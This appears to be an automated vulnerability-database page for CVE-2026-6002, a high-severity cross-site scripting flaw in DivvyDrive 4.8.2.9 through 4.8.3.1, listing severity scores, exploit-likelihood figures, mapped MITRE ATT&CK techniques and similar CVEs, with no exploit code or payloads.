Cyber Resilience

CVE-2026-6002

High

Published: 07 May 2026

Published
07 May 2026
Modified
07 May 2026
KEV Added
Patch
CVSS Score v3.1 8.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score 0.0033 24.6th percentile
Risk Priority 55 floored blend · peak EPSS

Summary

CVE-2026-6002 is a high-severity Basic XSS (CWE-80) vulnerability in Gov (inferred from references). Its CVSS base score is 8.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Drive-by Compromise (T1189); ranked at the 24.6th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross-Site Scripting (XSS). This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1189 Drive-by Compromise Initial Access
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.
T1539 Steal Web Session Cookie Credential Access
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

XSS vuln enables drive-by script injection against visitors and web session cookie theft.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2024-39363Shared CWE-80
CVE-2024-46910Shared CWE-80
CVE-2025-14835Shared CWE-80
CVE-2025-22501Shared CWE-80
CVE-2024-13497Shared CWE-80
CVE-2025-24680Shared CWE-80
CVE-2026-33080Shared CWE-80
CVE-2025-53835Shared CWE-80
CVE-2026-32891Shared CWE-80
CVE-2024-56199Shared CWE-80

Affected Assets

Gov
inferred from references and description; NVD did not file a CPE for this CVE

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References